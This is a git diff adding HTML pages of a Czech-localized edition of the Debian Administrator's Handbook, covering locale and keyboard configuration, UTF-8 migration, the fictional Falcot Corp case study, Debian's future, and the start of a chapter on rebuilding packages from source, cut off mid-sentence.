+              class="para">
+				The <span
+                class="pkg pkg">locales</span> package includes all the elements required for proper functioning of “localization” of various applications. During installation, this package will ask to select a set of supported languages. This set can be changed at any time by running <code
+                class="command">dpkg-reconfigure locales</code> as root.
+			</div><div
+              class="para">
+				The first question invites you to select “locales” to support. Selecting all English locales (meaning those beginning with “<code
+                class="literal">en_</code>”) is a reasonable choice. Do not hesitate to also enable other locales if the machine will host foreign users. The list of locales enabled on the system is stored in the <code
+                class="filename">/etc/locale.gen</code> file. It is possible to edit this file by hand, but you should run <code
+                class="command">locale-gen</code> after any modifications. It will generate the necessary files for the added locales to work, and remove any obsolete files.
+			</div><div
+              class="para">
+				The second question, entitled “Default locale for the system environment”, requests a default locale. The recommended choice in the U.S.A. is “<code
+                class="literal">en_US.UTF-8</code>”. British English speakers will prefer “<code
+                class="literal">en_GB.UTF-8</code>”, and Canadians will prefer either “<code
+                class="literal">en_CA.UTF-8</code>” or, for French, “<code
+                class="literal">fr_CA.UTF-8</code>”. The <code
+                class="filename">/etc/default/locale</code> file will then be modified to store this choice. From there, it is picked up by all user sessions since PAM will inject its content in the <code
+                class="varname">LANG</code> environment variable.
+			</div><a
+              id="id-1.11.5.5.10"
+              class="indexterm"></a><a
+              id="id-1.11.5.5.11"
+              class="indexterm"></a><a
+              id="id-1.11.5.5.12"
+              class="indexterm"></a><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.intro-pam"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BEHIND THE SCENES</em></span> <code
+                          class="filename">/etc/environment</code> and <code
+                          class="filename">/etc/default/locale</code></strong></p></div></div></div><div
+                class="para">
+				The <code
+                  class="filename">/etc/environment</code> file provides the <code
+                  class="command">login</code>, <code
+                  class="command">gdm</code>, or even <code
+                  class="command">ssh</code> programs with the correct environment variables to be created.
+			</div><div
+                class="para">
+				These applications do not create these variables directly, but rather via a PAM (<code
+                  class="filename">pam_env.so</code>) module. PAM (Pluggable Authentication Module) is a modular library centralizing the mechanisms for authentication, session initialization, and password management. See <a
+                  class="xref"
+                  href="sect.ldap-directory.html#sect.config-pam">11.7.3.2 – „Configuring PAM“</a> for an example of PAM configuration.
+			</div><div
+                class="para">
+				The <code
+                  class="filename">/etc/default/locale</code> file works in a similar manner, but contains only the <code
+                  class="varname">LANG</code> environment variable. Thanks to this split, some PAM users can inherit a complete environment without localization. Indeed, it is generally discouraged to run server programs with localization enabled; on the other hand, localization and regional settings are recommended for programs that open user sessions.
+			</div><a
+                id="id-1.11.5.5.13.5"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.13.6"
+                class="indexterm"></a></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.keyboard-config"></a>8.1.2. Configuring the Keyboard</h3></div></div></div><a
+              id="id-1.11.5.6.2"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.3"
+              class="indexterm"></a><div
+              class="para">
+				Even if the keyboard layout is managed differently in console and graphical mode, Debian offers a single configuration interface that works for both: it is based on debconf and is implemented in the <span
+                class="pkg pkg">keyboard-configuration</span> package. Thus the <code
+                class="command">dpkg-reconfigure keyboard-configuration</code> command can be used at any time to reset the keyboard layout.
+			</div><a
+              id="id-1.11.5.6.5"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.6"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.7"
+              class="indexterm"></a><div
+              class="para">
+				<a
+                id="id-1.11.5.6.8.1"
+                class="indexterm"></a>The questions are relevant to the physical keyboard layout (a standard PC keyboard in the US will be a “Generic 104 key”), then the layout to choose (generally “US”), and then the position of the AltGr key (right Alt). Finally comes the question of the key to use for the “Compose key”, which allows for entering special characters by combining keystrokes. Type successively <span
+                class="keycap"><strong>Compose</strong></span> <span
+                class="keycap"><strong>'</strong></span> <span
+                class="keycap"><strong>e</strong></span> and produce an e-acute (“é”). All these combinations are described in the <code
+                class="filename">/usr/share/X11/locale/en_US.UTF-8/Compose</code> file (or another file, determined according to the current locale indicated by <code
+                class="filename">/usr/share/X11/locale/compose.dir</code>).
+			</div><a
+              id="id-1.11.5.6.9"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.10"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.11"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.12"
+              class="indexterm"></a><div
+              class="para">
+				Note that the keyboard configuration for graphical mode described here only affects the default layout; the GNOME and KDE Plasma environments, among others, provide a keyboard control panel in their preferences allowing each user to have their own configuration. Some additional options regarding the behavior of some particular keys are also available in these control panels.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.utf8-migration"></a>8.1.3. Migrating to UTF-8</h3></div></div></div><div
+              class="para">
+				The generalization of UTF-8 encoding has been a long awaited solution to numerous difficulties with interoperability, since it facilitates international exchange and removes the arbitrary limits on characters that can be used in a document. The one drawback is that it had to go through a rather difficult transition phase. Since it could not be completely transparent (that is, it could not happen at the same time all over the world), two conversion operations were required: one on file contents, and the other on filenames. Fortunately, the bulk of this migration has been completed and we discuss it largely for reference.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> <span
+                          class="foreignphrase"><em
+                            class="foreignphrase">Mojibake</em></span> and interpretation errors</strong></p></div></div></div><div
+                class="para">
+				When a text is sent (or stored) without encoding information, it is not always possible for the recipient to know with certainty what convention to use for determining the meaning of a set of bytes. You can usually get an idea by getting statistics on the distribution of values present in the text, but that doesn't always give a definite answer. When the encoding system chosen for reading differs from that used in writing the file, the bytes are mis-interpreted, and you get, at best, errors on some characters, or, at worst, something completely illegible.
+			</div><div
+                class="para">
+				Thus, if a French text appears normal with the exception of accented letters and certain symbols which appear to be replaced with sequences of characters like “é” or è” or “ç”, it is probably a file encoded as UTF-8 but interpreted as ISO-8859-1 or ISO-8859-15. This is a sign of a local installation that has not yet been migrated to UTF-8. If, instead, you see question marks instead of accented letters — even if these question marks seem to also replace a character that should have followed the accented letter — it is likely that your installation is already configured for UTF-8 and that you have been sent a document encoded in Western ISO.
+			</div><div
+                class="para">
+				So much for “simple” cases. These cases only appear in Western culture, since Unicode (and UTF-8) was designed to maximize the common points with historical encodings for Western languages based on the Latin alphabet, which allows recognition of parts of the text even when some characters are missing.
+			</div><div
+                class="para">
+				In more complex configurations, which, for example, involve two environments corresponding to two different languages that do not use the same alphabet, you often get completely illegible results — a series of abstract symbols that have nothing to do with each other. This is especially common with Asian languages due to their numerous languages and writing systems. The Japanese word <span
+                  class="foreignphrase"><em
+                    class="foreignphrase">mojibake</em></span> has been adopted to describe this phenomenon. When it appears, diagnosis is more complex and the simplest solution is often to simply migrate to UTF-8 on both sides.
+			</div></div><div
+              class="para">
+				As far as file names are concerned, the migration can be relatively simple. The <code
+                class="command">convmv</code> tool (in the package with the same name) was created specifically for this purpose; it allows renaming files from one encoding to another. The use of this tool is relatively simple, but we recommend doing it in two steps to avoid surprises. The following example illustrates a UTF-8 environment containing directory names encoded in ISO-8859-15, and the use of <code
+                class="command">convmv</code> to rename them.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls travail/</code></strong>
+<code
+                class="computeroutput">Ic?nes  ?l?ments graphiques  Textes
+$ </code><strong
+                class="userinput"><code>convmv -r -f iso-8859-15 -t utf-8 travail/</code></strong>
+<code
+                class="computeroutput">Starting a dry run without changes...
+mv "travail/�l�ments graphiques"        "travail/Éléments graphiques"
+mv "travail/Ic�nes"     "travail/Icônes"
+No changes to your files done. Use --notest to finally rename the files.
+$ </code><strong
+                class="userinput"><code>convmv -r --notest -f iso-8859-15 -t utf-8 travail/</code></strong>
+<code
+                class="computeroutput">mv "travail/�l�ments graphiques"        "travail/Éléments graphiques"
+mv "travail/Ic�nes"     "travail/Icônes"
+Ready!
+$ </code><strong
+                class="userinput"><code>ls travail/</code></strong>
+<code
+                class="computeroutput">Éléments graphiques  Icônes  Textes</code></pre><div
+              class="para">
+				For the file content, conversion procedures are more complex due to the vast variety of existing file formats. Some file formats include encoding information that facilitates the tasks of the software used to treat them; it is sufficient, then, to open these files and re-save them specifying UTF-8 encoding. In other cases, you have to specify the original encoding (ISO-8859-1 or “Western”, or ISO-8859-15 or “Western (Euro)”, according to the formulations) when opening the file.
+			</div><div
+              class="para">
+				For simple text files, you can use <code
+                class="command">recode</code> (in the package of the same name) which allows automatic recoding. This tool has numerous options so you can play with its behavior. We recommend you consult the documentation, the <span
+                class="citerefentry"><span
+                  class="refentrytitle">recode</span>(1)</span> man page, or the <span
+                class="citerefentry"><span
+                  class="refentrytitle">recode</span></span> info page (more complete).
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.common-procedures.html"><strong>Předcházející</strong>7.2. Common Procedures</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.network-config.html"><strong>Další</strong>8.2. Configuring the Network</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/case-study.html b/publish/cs-CZ/Debian/9/html/debian-handbook/case-study.html
new file mode 100644
index 000000000..86811f8a4
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/case-study.html
@@ -0,0 +1,140 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 2. Presenting the Case Study</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.release-lifecycle.html"
+        title="1.6. Lifecycle of a Release" /><link
+        rel="next"
+        href="sect.master-plan.html"
+        title="2.2. Master Plan" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/case-study.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.release-lifecycle.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.master-plan.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="case-study"></a>Kapitola 2. Presenting the Case Study</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="case-study.html#sect.fast-growing-it-needs">2.1. Fast Growing IT Needs</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.master-plan.html">2.2. Master Plan</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.why-gnu-linux.html">2.3. Why a GNU/Linux Distribution?</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.why-debian.html">2.4. Why the Debian Distribution?</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.why-debian.html#id-1.5.8.5">2.4.1. Commercial and Community Driven Distributions</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.why-debian-stable.html">2.5. Why Debian Stretch?</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		In the context of this book, you are the system administrator of a growing small business. The time has come for you to redefine the information systems master plan for the coming year in collaboration with your directors. You choose to progressively migrate to Debian, both for practical and economical reasons. Let's see in more detail what's in store for you…
+	</div></div><div
+          class="para">
+		We have envisioned this case study to approach all modern information system services currently used in a medium sized company. After reading this book, you will have all of the elements necessary to install Debian on your servers and fly on your own wings. You will also learn how to efficiently find information in the event of difficulties.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.fast-growing-it-needs"></a>2.1. Fast Growing IT Needs</h2></div></div></div><div
+            class="para">
+			Falcot Corp is a manufacturer of high quality audio equipment. The company is growing strongly, and has two facilities, one in Saint-Étienne, and another in Montpellier. The former has around 150 employees; it hosts a factory for the manufacturing of speakers, a design lab, and all administrative office. The Montpellier site is smaller, with only about 50 workers, and produces amplifiers.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Fictional company created for case study</strong></p></div></div></div><div
+              class="para">
+			The Falcot Corp company used as an example here is completely fictional. Any resemblance to an existing company is purely coincidental. Likewise, some example data throughout this book may be fictional.
+		</div></div><div
+            class="para">
+			The information system has had difficulty keeping up with the company's growth, so they are now determined to completely redefine it to meet various goals established by management:
+		</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+					modern, easily scalable infrastructure;
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					reducing cost of software licenses thanks to use of Open Source software;
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					installation of an e-commerce website, possibly B2B (business to business, i.e. linking of information systems between different companies, such as a supplier and its clients);
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					significant improvement in security to better protect trade secrets related to new products.
+				</div></li></ul></div><div
+            class="para">
+			The entire information system will be overhauled with these goals in mind.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.release-lifecycle.html"><strong>Předcházející</strong>1.6. Lifecycle of a Release</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.master-plan.html"><strong>Další</strong>2.2. Master Plan</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/conclusion.html b/publish/cs-CZ/Debian/9/html/debian-handbook/conclusion.html
new file mode 100644
index 000000000..1a01ce750
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/conclusion.html
@@ -0,0 +1,116 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 16. Conclusion: Debian's Future</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Future, Improvements, Opinions" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.becoming-package-maintainer.html"
+        title="15.4. Becoming a Package Maintainer" /><link
+        rel="next"
+        href="sect.future-of-debian.html"
+        title="16.2. Debian's Future" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/conclusion.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.becoming-package-maintainer.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.future-of-debian.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="conclusion"></a>Kapitola 16. Conclusion: Debian's Future</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="conclusion.html#sect.upcoming-developments">16.1. Upcoming Developments</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.future-of-debian.html">16.2. Debian's Future</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.future-of-this-book.html">16.3. Future of this Book</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		The story of Falcot Corp ends with this last chapter; but Debian lives on, and the future will certainly bring many interesting surprises.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.upcoming-developments"></a>16.1. Upcoming Developments</h2></div></div></div><div
+            class="para">
+			Weeks (or months) before a new version of Debian is released, the Release Manager picks the codename for the next version. Now that Debian version 8 is out, the developers are already busy working on the next version, codenamed <span
+              class="distribution distribution">Stretch</span>…
+		</div><div
+            class="para">
+			There is no official list of planned changes, and Debian never makes promises relating to technical goals of the coming versions. However, a few development trends can already be noted, and we can try some bets on what might happen (or not).
+		</div><div
+            class="para">
+			In order to improve security and trust, most if not all the packages will be made to build reproducibly; that is to say, it will be possible to rebuild byte-for-byte identical binary packages from the source packages, thus allowing everyone to verify that no tampering has happened during the builds.
+		</div><div
+            class="para">
+			In a related theme, a lot of effort will have gone into improving security by default, and mitigating both “traditional” attacks and the new threats implied by mass surveillance.
+		</div><div
+            class="para">
+			Of course, all the main software suites will have had a major release. The latest version of the various desktops will bring better usability and new features. Wayland, the new display server that is being developed to replace X11 with a more modern alternative, will be available (although maybe not default) for at least some desktop environments.
+		</div><div
+            class="para">
+			A new feature of the archive maintenance software, “bikesheds”, will allow developers to host special-purpose package repositories in addition to the main repositories; this will allow for personal package repositories, repositories for software not ready to go into the main archive, repositories for software that has only a very small audience, temporary repositories for testing new ideas, and so on.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.becoming-package-maintainer.html"><strong>Předcházející</strong>15.4. Becoming a Package Maintainer</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.future-of-debian.html"><strong>Další</strong>16.2. Debian's Future</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/debian-packaging.html b/publish/cs-CZ/Debian/9/html/debian-handbook/debian-packaging.html
new file mode 100644
index 000000000..4e3ca7757
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/debian-packaging.html
@@ -0,0 +1,299 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 15. Creating a Debian Package</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Backport, Rebuild, Source package, Archive, Meta-package, Debian Developer, Maintainer" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.dealing-with-compromised-machine.html"
+        title="14.7. Dealing with a Compromised Machine" /><link
+        rel="next"
+        href="sect.building-first-package.html"
+        title="15.2. Building your First Package" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/debian-packaging.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dealing-with-compromised-machine.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.building-first-package.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="debian-packaging"></a>Kapitola 15. Creating a Debian Package</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="debian-packaging.html#sect.rebuilding-package">15.1. Rebuilding a Package from its Sources</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="debian-packaging.html#id-1.18.4.3">15.1.1. Getting the Sources</a></span></dt><dt><span
+                    class="section"><a
+                      href="debian-packaging.html#id-1.18.4.4">15.1.2. Making Changes</a></span></dt><dt><span
+                    class="section"><a
+                      href="debian-packaging.html#id-1.18.4.5">15.1.3. Starting the Rebuild</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.building-first-package.html">15.2. Building your First Package</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.building-first-package.html#id-1.18.5.2">15.2.1. Meta-Packages or Fake Packages</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.building-first-package.html#id-1.18.5.3">15.2.2. Simple File Archive</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.setup-apt-package-repository.html">15.3. Creating a Package Repository for APT</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.becoming-package-maintainer.html">15.4. Becoming a Package Maintainer</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.becoming-package-maintainer.html#id-1.18.7.2">15.4.1. Learning to Make Packages</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.becoming-package-maintainer.html#id-1.18.7.3">15.4.2. Acceptance Process</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		It is quite common, for an administrator who has been handling Debian packages in a regular fashion, to eventually feel the need to create their own packages, or to modify an existing package. This chapter aims to answer the most common questions in this field, and provide the required elements to take advantage of the Debian infrastructure in the best way. With any luck, after trying your hand for local packages, you may even feel the need to go further than that and join the Debian project itself!
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rebuilding-package"></a>15.1. Rebuilding a Package from its Sources</h2></div></div></div><div
+            class="para">
+			Rebuilding a binary package is required under several sets of circumstances. In some cases, the administrator needs a software feature that requires the software to be compiled from sources, with a particular compilation option; in others, the software as packaged in the installed version of Debian is not recent enough. In the latter case, the administrator will usually build a more recent package taken from a newer version of Debian — such as <span
+              class="distribution distribution">Testing</span> or even <span
+              class="distribution distribution">Unstable</span> — so that this new package works in their <span
+              class="distribution distribution">Stable</span> distribution; this operation is called “backporting”. As usual, care should be taken, before undertaking such a task, to check whether it has been done already — a quick look on the Debian Package Tracker for that package will reveal that information. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://tracker.debian.org/">https://tracker.debian.org/</a></div> <a
+              id="id-1.18.4.2.5"
+              class="indexterm"></a>
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.4.3"></a>15.1.1. Getting the Sources</h3></div></div></div><div
+              class="para">
+				Rebuilding a Debian package starts with getting its source code. The easiest way is to use the <code
+                class="command">apt-get source <em
+                  class="replaceable">source-package-name</em></code> command. This command requires a <code
+                class="literal">deb-src</code> line in the <code
+                class="filename">/etc/apt/sources.list</code> file, and up-to-date index files (i.e. <code
+                class="command">apt-get update</code>). These conditions should already be met if you followed the instructions from the chapter dealing with APT configuration (see <a
+                class="xref"
+                href="apt.html#sect.apt-sources.list">6.1 – „Filling in the <code
+                  class="filename">sources.list</code> File“</a>). Note however, that you will be downloading the source packages from the Debian version mentioned in the <code
+                class="literal">deb-src</code> line. If you need another version, you may need to download it manually from a Debian mirror or from the web site. This involves fetching two or three files (with extensions <code
+                class="filename">*.dsc</code> — for <span
+                class="emphasis"><em>Debian Source Control</em></span> — <code
+                class="filename">*.tar.<em
+                  class="replaceable">comp</em></code>, and sometimes <code
+                class="filename">*.diff.gz</code> or <code
+                class="filename">*.debian.tar.<em
+                  class="replaceable">comp</em></code> — <em
+                class="replaceable">comp</em> taking one value among <code
+                class="literal">gz</code>, <code
+                class="literal">bz2</code> or <code
+                class="literal">xz</code> depending on the compression tool in use), then run the <code
+                class="command">dpkg-source -x <em
+                  class="replaceable">file.dsc</em></code> command. If the <code
+                class="filename">*.dsc</code> file is directly accessible at a given URL, there is an even simpler way to fetch it all, with the <code
+                class="command">dget <em
+                  class="replaceable">URL</em></code> command. This command (which can be found in the <span
+                class="pkg pkg">devscripts</span> package) fetches the <code
+                class="filename">*.dsc</code> file at the given address, then analyzes its contents, and automatically fetches the file or files referenced within. Once everything has been downloaded, it extracts the source package (unless the <code
+                class="literal">-d</code> or <code
+                class="literal">--download-only</code> option is used).
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.4.4"></a>15.1.2. Making Changes</h3></div></div></div><div
+              class="para">
+				The source of the package is now available in a directory named after the source package and its version (for instance, <span
+                class="emphasis"><em>samba-4.1.17+dfsg</em></span>); this is where we'll work on our local changes.
+			</div><div
+              class="para">
+				The first thing to do is to change the package version number, so that the rebuilt packages can be distinguished from the original packages provided by Debian. Assuming the current version is <code
+                class="literal">2:4.1.17+dfsg-2</code>, we can create version <code
+                class="literal">2:4.1.17+dfsg-2falcot1</code>, which clearly indicates the origin of the package. This makes the package version number higher than the one provided by Debian, so that the package will easily install as an update to the original package. Such a change is best effected with the <code
+                class="command">dch</code> command (<span
+                class="emphasis"><em>Debian CHangelog</em></span>) from the <span
+                class="pkg pkg">devscripts</span> package, with an command such as <code
+                class="command">dch --local falcot</code>. This invokes a text editor (<code
+                class="command">sensible-editor</code> — this should be your favorite editor if it is mentioned in the <code
+                class="varname">VISUAL</code> or <code
+                class="varname">EDITOR</code> environment variables, and the default editor otherwise) to allow documenting the differences brought by this rebuild. This editor shows us that <code
+                class="command">dch</code> really did change the <code
+                class="filename">debian/changelog</code> file.
+			</div><div
+              class="para">
+				When a change in build options is required, the changes need to be made in <code
+                class="filename">debian/rules</code>, which drives the steps in the package build process. In the simplest cases, the lines concerning the initial configuration (<code
+                class="literal">./configure …</code>) or the actual build (<code
+                class="literal">$(MAKE) …</code> or <code
+                class="literal">make …</code>) are easy to spot. If these commands are not explicitly called, they are probably a side effect of another explicit command, in which case please refer to their documentation to learn more about how to change the default behavior. With packages using <code
+                class="command">dh</code>, you might need to add an override for the <code
+                class="command">dh_auto_configure</code> or <code
+                class="command">dh_auto_build</code> commands (see their respective manual pages for explanations on how to achieve this).
+			</div><div
+              class="para">
+				Depending on the local changes to the packages, an update may also be required in the <code
+                class="filename">debian/control</code> file, which contains a description of the generated packages. In particular, this file contains <code
+                class="literal">Build-Depends</code> lines controlling the list of dependencies that must be fulfilled at package build time. These often refer to versions of packages contained in the distribution the source package comes from, but which may not be available in the distribution used for the rebuild. There is no automated way to determine if a dependency is real or only specified to guarantee that the build should only be attempted with the latest version of a library — this is the only available way to force an <span
